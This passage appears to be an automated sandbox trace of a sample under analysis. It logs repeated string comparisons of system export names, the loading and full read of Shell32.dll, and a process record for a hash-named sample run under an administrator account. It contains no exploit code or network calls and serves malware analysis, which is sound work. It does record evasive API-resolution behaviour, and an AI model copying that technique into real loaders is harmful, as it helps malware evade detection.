(lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0290.391] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0290.391] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0290.392] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0290.392] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.393] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0290.393] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0290.393] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0290.393] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.394] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.394] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.395] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.395] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.396] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.397] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.504] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0290.504] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.504] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0290.504] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0290.504] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0290.504] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0290.504] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0290.505] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0290.506] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0290.507] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0290.507] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0290.507] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.507] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0290.508] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0290.508] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0290.509] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0293.861] GetProcessHeap () returned 0x5d0000 [0293.861] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4009040 | out: hHeap=0x5d0000) returned 1 [0294.038] GetProcessHeap () returned 0x5d0000 [0294.038] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e90c0 [0294.040] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0294.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0294.040] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0294.040] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0294.040] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0294.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0294.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0294.041] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0294.041] GetProcessHeap () returned 0x5d0000 [0294.041] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1587258) returned 0x4005040 [0294.304] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0294.304] ReadFile (hFile=0x140, lpBuffer=0x4005040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0) Thread: id = 232 os_tid = 0x1294 Process: id = "35" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x25c73000" os_pid = "0x1290" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], 